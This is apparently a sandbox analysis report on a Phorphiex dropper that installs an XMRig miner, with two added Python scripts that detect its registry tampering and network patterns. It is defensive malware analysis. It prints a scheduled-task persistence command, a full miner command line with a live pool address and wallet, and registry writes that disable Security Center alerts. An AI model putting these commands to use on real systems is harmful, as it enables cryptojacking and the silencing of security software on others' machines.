Analysis Overview
SHA256
c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d
Threat Level: Known bad
The file c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d was found to be: Known bad.
Malicious Activity Summary
Phorphiex family
xmrig
Windows security bypass
Phorphiex
XMRig Miner payload
Executes dropped EXE
Downloads MZ/PE file
Windows security modification
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Windows directory
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-12 15:55
Signatures
Phorphiex family
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-12 15:55
Reported
2022-08-12 15:57
Platform
win10-20220722-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\612732430.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1740120124.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
| N/A | N/A | C:\Windows\wcdsemgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1533620072.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\47587152.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2314210268.exe | N/A |
| N/A | N/A | C:\Users\Admin\wincsvns.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wcdsemgr.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wcdsemgr.exe" | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
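The two registry signatures above (Security Center override/notify values forced to 1, and a Run key named "Windows Settings" pointing at a binary dropped straight into C:\Windows) translate directly into host-based detection logic. The following Python is an added example, not part of the sandbox report: it classifies Sysmon Event ID 13 (RegistryEvent, SetValue) style records. The field names `image`, `target` and `details` are assumptions modelled on the Sysmon schema, and the sample events are constructed from the indicators in the tables above plus two benign controls.

```python
"""Detect Security Center tampering and suspicious Run-key persistence.

Added example, not part of the sandbox report. Input records mimic Sysmon
Event ID 13 (RegistryEvent, SetValue); the field names `image`, `target`
and `details` are assumptions modelled on that schema, and the sample
events are constructed from the indicators in the report.
"""
import re

# Values under ...\Microsoft\Security Center that, when set to 1, either
# suppress Action Center notifications or claim a third-party product
# already covers the feature.
SECURITY_CENTER_VALUES = {
    "FirewallOverride", "FirewallDisableNotify",
    "AntiVirusOverride", "AntiVirusDisableNotify",
    "AntiSpywareOverride", "UpdatesOverride", "UpdatesDisableNotify",
}
SECURITY_CENTER_KEY = re.compile(
    r"\\(?:WOW6432Node\\)?Microsoft\\Security Center\\(?P<value>[^\\]+)$", re.I)
RUN_KEY = re.compile(
    r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\(?P<name>[^\\]+)$", re.I)
# An autorun pointing straight into %SystemRoot% (not a subfolder) or into a
# user profile is atypical for legitimate software.
SUSPICIOUS_RUN_TARGET = re.compile(
    r"^(?:C:\\Windows\\[^\\]+\.exe|C:\\Users\\[^\\]+\\(?:AppData\\.*|[^\\]+\.exe))$", re.I)


def dword(details):
    """Parse a DWORD rendered as 'DWORD (0x00000001)' (Sysmon) or '"1"' (report)."""
    m = re.search(r"0x([0-9a-f]+)", details, re.I)
    if m:
        return int(m.group(1), 16)
    plain = details.strip('"')
    return int(plain) if plain.isdigit() else None


def classify(event):
    """Return the alert names triggered by one SetValue event."""
    alerts = []
    target, details = event["target"], event["details"]
    m = SECURITY_CENTER_KEY.search(target)
    if m and m.group("value") in SECURITY_CENTER_VALUES and dword(details) == 1:
        alerts.append("security_center_tamper:" + m.group("value"))
    m = RUN_KEY.search(target)
    if m:
        # the report escapes backslashes in string values; Sysmon does not
        path = details.strip('"').replace("\\\\", "\\")
        if SUSPICIOUS_RUN_TARGET.match(path):
            alerts.append(f"suspicious_run_key:{m.group('name')}->{path}")
    return alerts


def scan(events):
    """Map each writing process image to the alerts its registry writes raised."""
    by_image = {}
    for ev in events:
        for alert in classify(ev):
            by_image.setdefault(ev["image"], []).append(alert)
    return by_image


SAMPLE_EVENTS = [  # constructed from the report's indicators plus two benign controls
    {"image": r"C:\Windows\wcdsemgr.exe",
     "target": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride",
     "details": "DWORD (0x00000001)"},
    {"image": r"C:\Windows\wklopsvcs.exe",
     "target": r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify",
     "details": '"1"'},
    {"image": r"C:\Users\Admin\AppData\Local\Temp\516319480.exe",
     "target": r"HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings",
     "details": r'"C:\\Windows\\wcdsemgr.exe"'},
    {"image": r"C:\Program Files\Vendor\setup.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r"C:\Program Files\Vendor\tray.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusOverride",
     "details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for image, alerts in scan(SAMPLE_EVENTS).items():
        print(image, alerts)
```

The value check matters: a legitimate security product registers itself through the Security Center API, so a raw SetValue of these names to 1 by a process that is not a registered AV or firewall is itself the signal, and the writing image (here two binaries dropped directly under C:\Windows) is what the analyst pivots on next.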
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 220 set thread context of 3608 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\System32\svchost.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File created | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
| File opened for modification | C:\Windows\wcdsemgr.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\conhost.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\conhost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | "C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe" |
| C:\Windows\wklopsvcs.exe | C:\Windows\wklopsvcs.exe |
| C:\Users\Admin\AppData\Local\Temp\612732430.exe | C:\Users\Admin\AppData\Local\Temp\612732430.exe |
| C:\Users\Admin\AppData\Local\Temp\1740120124.exe | C:\Users\Admin\AppData\Local\Temp\1740120124.exe |
| C:\Users\Admin\AppData\Local\Temp\516319480.exe | C:\Users\Admin\AppData\Local\Temp\516319480.exe |
| C:\Windows\wcdsemgr.exe | C:\Windows\wcdsemgr.exe |
| C:\Users\Admin\AppData\Local\Temp\1533620072.exe | C:\Users\Admin\AppData\Local\Temp\1533620072.exe |
| C:\Users\Admin\AppData\Local\Temp\47587152.exe | C:\Users\Admin\AppData\Local\Temp\47587152.exe |
| C:\Users\Admin\AppData\Local\Temp\2314210268.exe | C:\Users\Admin\AppData\Local\Temp\2314210268.exe |
| C:\Windows\System32\conhost.exe | "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2314210268.exe" |
| C:\Windows\System32\cmd.exe | "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe" |
| C:\Windows\system32\schtasks.exe | schtasks /create /f /sc onlogon /rl highest /tn "wincsvns" /tr "C:\Users\Admin\wincsvns.exe" |
| C:\Windows\System32\cmd.exe | "cmd" cmd /c "C:\Users\Admin\wincsvns.exe" |
| C:\Users\Admin\wincsvns.exe | C:\Users\Admin\wincsvns.exe |
| C:\Windows\System32\conhost.exe | "C:\Windows\System32\conhost.exe" "C:\Users\Admin\wincsvns.exe" |
| C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe" |
| C:\Windows\System32\svchost.exe | C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=185.215.113.84:8586 --user=43RrFTp7myuC9LHNDXFDm2H49Qfp5iMfbLjcbVEmKv5qdoP5vqJyKnrHixqv2QPEtW2jBjeAXzBgtjbzkNNg47Zw1DH2D2H --pass=x --cpu-max-threads-hint=40 --cinit-idle-wait=10 --cinit-idle-cpu=80 |
| C:\Windows\System32\conhost.exe | "C:\Windows\System32\conhost.exe" "/sihost64" |
Network
| Country | Destination | Domain | Proto |
| FR | 51.11.192.48:443 | | tcp |
| US | 13.107.4.50:80 | | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| N/A | 10.231.50.30:40500 | | udp |
| IR | 37.255.124.89:40500 | | tcp |
| UZ | 62.209.132.199:40500 | | udp |
| EG | 154.237.114.27:40500 | | udp |
| UZ | 80.80.222.89:40500 | | udp |
| MX | 187.200.76.99:40500 | | udp |
| SY | 82.137.244.49:40500 | | udp |
| RU | 95.163.189.237:40500 | | tcp |
| GE | 178.236.57.16:40500 | | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| IR | 37.255.195.231:40500 | | udp |
| IN | 45.248.160.159:40500 | | tcp |
| IN | 117.206.43.166:40500 | | udp |
| PK | 39.53.176.26:40500 | | udp |
| IR | 151.234.138.54:40500 | | udp |
| AZ | 91.242.14.27:40500 | | udp |
| IR | 31.56.142.196:40500 | | udp |
| IR | 87.107.151.80:40500 | | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| DZ | 41.96.28.194:40500 | | udp |
| US | 69.67.151.23:40500 | | udp |
| UZ | 213.230.71.54:40500 | | udp |
| RU | 2.61.9.253:40500 | | udp |
| IN | 117.201.169.74:40500 | | udp |
| AO | 154.65.244.161:40500 | | tcp |
| YE | 178.130.94.154:40500 | | udp |
| RU | 185.215.113.84:8586 | | tcp |
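Three things stand out in the network table: repeated plain HTTP to 185.215.113.84:80, a single TCP session to the same host on 8586 (the --url of the miner command line), and a fan-out to many unrelated hosts in many countries on one port, 40500, over both TCP and UDP. The following Python is an added example, not part of the sandbox report: it turns those observations into a repeatable summary over rows of the table. ROWS is a hand-transcribed subset of the table above, MINER_POOL is taken from the miner command line, and the thresholds and finding labels are my own.

```python
"""Summarise the report's Network table: pool traffic versus single-port fan-out.

Added example, not part of the sandbox report. ROWS is a subset of the
report's Network table, transcribed by hand; MINER_POOL is the --url value
from the miner command line; the thresholds and finding labels are my own.
"""
import ipaddress
from collections import defaultdict

ROWS = [  # (country, destination, domain, proto), constructed from the report
    ("FR", "51.11.192.48:443", "", "tcp"),
    ("US", "13.107.4.50:80", "", "tcp"),
    ("RU", "185.215.113.84:80", "185.215.113.84", "tcp"),
    ("US", "8.8.8.8:53", "www.update.microsoft.com", "udp"),
    ("US", "20.109.209.108:80", "www.update.microsoft.com", "tcp"),
    ("N/A", "10.231.50.30:40500", "", "udp"),
    ("IR", "37.255.124.89:40500", "", "tcp"),
    ("UZ", "62.209.132.199:40500", "", "udp"),
    ("EG", "154.237.114.27:40500", "", "udp"),
    ("MX", "187.200.76.99:40500", "", "udp"),
    ("RU", "95.163.189.237:40500", "", "tcp"),
    ("IN", "45.248.160.159:40500", "", "tcp"),
    ("PK", "39.53.176.26:40500", "", "udp"),
    ("RU", "185.215.113.84:8586", "", "tcp"),
]
MINER_POOL = ("185.215.113.84", 8586)


def split_dest(dest):
    """'1.2.3.4:443' -> ('1.2.3.4', 443)."""
    host, _, port = dest.rpartition(":")
    return host, int(port)


def summarise(rows, fanout_min_hosts=5, fanout_min_countries=3):
    """Return sorted finding strings for a list of (country, dest, domain, proto)."""
    by_port = defaultdict(lambda: {"hosts": set(), "countries": set(), "protos": set()})
    findings = set()
    for country, dest, domain, proto in rows:
        host, port = split_dest(dest)
        if (host, port) == MINER_POOL:
            findings.add(f"mining_pool:{host}:{port}/{proto}")
        elif host == MINER_POOL[0]:
            # same server on another port: download/C2 channel worth pulling the pcap for
            findings.add(f"pool_host_other_port:{host}:{port}/{proto}")
        if ipaddress.ip_address(host).is_private:
            findings.add(f"private_dst:{host}:{port}/{proto}")
            continue
        if domain and domain != host:
            continue  # name-resolved destinations are not part of the raw fan-out
        bucket = by_port[port]
        bucket["hosts"].add(host)
        bucket["countries"].add(country)
        bucket["protos"].add(proto)
    for port, b in by_port.items():
        if len(b["hosts"]) >= fanout_min_hosts and len(b["countries"]) >= fanout_min_countries:
            findings.add(
                f"single_port_fanout:{port} hosts={len(b['hosts'])} "
                f"countries={len(b['countries'])} protos={'+'.join(sorted(b['protos']))}"
            )
    return sorted(findings)


if __name__ == "__main__":
    for finding in summarise(ROWS):
        print(finding)
```

The fan-out bucket counts distinct hosts and countries per destination port rather than per host, which is what separates this pattern from ordinary CDN or update traffic (few hosts, name-resolved, well-known ports). The report does not say what the 40500 traffic is, so the finding only records the shape; the one RFC 1918 destination on that port is reported separately rather than counted.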
Files
memory/4956-127-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-128-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-129-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-130-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-131-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-132-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-133-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-134-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-135-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-136-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-137-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-138-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-139-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-140-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-141-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-142-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-143-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-144-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-145-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-146-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-147-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-148-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-149-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-150-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-151-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-152-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-154-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-153-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-155-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-156-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-157-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-158-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-159-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-160-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-161-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-162-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-163-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/4956-164-0x0000000077E40000-0x0000000077FCE000-memory.dmp
C:\Windows\wklopsvcs.exe
| MD5 | 209baf40779b80d5e443c3dbbd656bfb |
| SHA1 | b64fa8dded031d5dacac519a2035cefcd05e6503 |
| SHA256 | c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d |
| SHA512 | 9b4e3e82e141e569c85f22dd215f804b2f4e8969cda858662efca67532ba57d2e0acdbaa179524b4996be62f9acee3298eaf6cdfd03eff7e39e23bc7163c440e |
memory/1868-165-0x0000000000000000-mapping.dmp
memory/1868-167-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-168-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-169-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-170-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-171-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-172-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-173-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-175-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-176-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-177-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-178-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-179-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-180-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-181-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-182-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-183-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-184-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-185-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-186-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-187-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-188-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-189-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-190-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-191-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-193-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/1868-192-0x0000000077E40000-0x0000000077FCE000-memory.dmp
memory/3416-215-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\612732430.exe
| MD5 | c8a69840ffff790ea975bb0cf55f7f4d |
| SHA1 | dd1c74f0eb2fc813d16c96669e22fb657b67c4b3 |
| SHA256 | e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc |
| SHA512 | df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a |
memory/3148-255-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1740120124.exe
| MD5 | a475e43527d7dc7d6f2d23bad64fcc99 |
| SHA1 | 793a7625c0106d6cd79d060b4eec94e58530833e |
| SHA256 | f97c43bf3dce6180e658f2c3776e31cf52472b28ac8249be4d307880b6405eeb |
| SHA512 | 4af57a218d7d790b5ec4581dd2bc941deff05ea11bf6054a9d268c054af421977cdd68d5090884358208925f50023c97e9cfaba0831d72e9bcdcca729447d900 |
memory/4476-292-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\516319480.exe
| MD5 | 5741eadfc89a1352c61f1ff0a5c01c06 |
| SHA1 | cdff6ddd67f17385f283a0f9e8de76731f11a9b6 |
| SHA256 | ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3 |
| SHA512 | 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063 |
memory/2016-333-0x0000000000000000-mapping.dmp
C:\Windows\wcdsemgr.exe
| MD5 | 5741eadfc89a1352c61f1ff0a5c01c06 |
| SHA1 | cdff6ddd67f17385f283a0f9e8de76731f11a9b6 |
| SHA256 | ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3 |
| SHA512 | 08104893c726e06c6fe7687394d084365b72cf19e821be0d7a1b094c9a0d54ccea65fd01ea33a1f507680d21c6f98e62e2d765b4a0ce3b3d8d458063bd375063 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WLUPZK3F\2[1]
| MD5 | 573584190b9ae1f05e0b40591df933c4 |
| SHA1 | 412fe72d4eb447ac1744bea4a35360703b1fb110 |
| SHA256 | 85348184c11fe6ea7866ab07f01a7acdd189b0c349b2775f1d28f188b45fa074 |
| SHA512 | cc33f657047478259fb4ff1d610b9e8adf55744aa4a0a015413cf2747b11992c4d2d5df9d449690c1d28d905e92e93f2b915edf51e8361973018b17bfad496d4 |
memory/4912-384-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1533620072.exe
| MD5 | c8a69840ffff790ea975bb0cf55f7f4d |
| SHA1 | dd1c74f0eb2fc813d16c96669e22fb657b67c4b3 |
| SHA256 | e532a8c62dbf01fecc09896f376e689ee836c5498ff24586ed142f72cfd174dc |
| SHA512 | df22b912e15640cd1c5f91908e1e2d2b4fc7be27d54415fd2c0ba5f0de83a785662b67912e4513e13fde30abab4082763d4dd6e65ddc2cdfe47bbe6ee40d249a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\CNLYUSDZ\3[1]
| MD5 | 9e2f163c15ee457be1f51981985570a1 |
| SHA1 | 4a191e6da4a85b915f285e758d0789d2ede3aff1 |
| SHA256 | c7de55ddd548f4f268979e1f0c70ab0edb2566c0ce46b921ea281e1570abad82 |
| SHA512 | 4b3eae4a1df79ac8805f46d32daecdb54028d160a5056679d4478c08e7f8ff42df5f84f4b1fe2cb8b5f3574eae5b18a94ad865edfc4d314a51118316c907967d |
C:\Users\Admin\tncmds.dat
| MD5 | 07872b17cfd93a2792bd0b17f5c07002 |
| SHA1 | 7de2ee0b5255ecc6720fb91cae5e51af20a0e4c5 |
| SHA256 | 44a3fbe34f99b539d55342fc99c33a9d5c6da95bfc765d94c47eb64ecbdbede0 |
| SHA512 | f6c519a48afd92a1eee0f6e4efdf9f0c0cd6104e7edae202aee33d1d8036be3be681032383c0b36fd1ca71ae53600d55b05bb736410f905de06b0f5364d64d37 |
memory/2480-426-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\47587152.exe
| MD5 | a475e43527d7dc7d6f2d23bad64fcc99 |
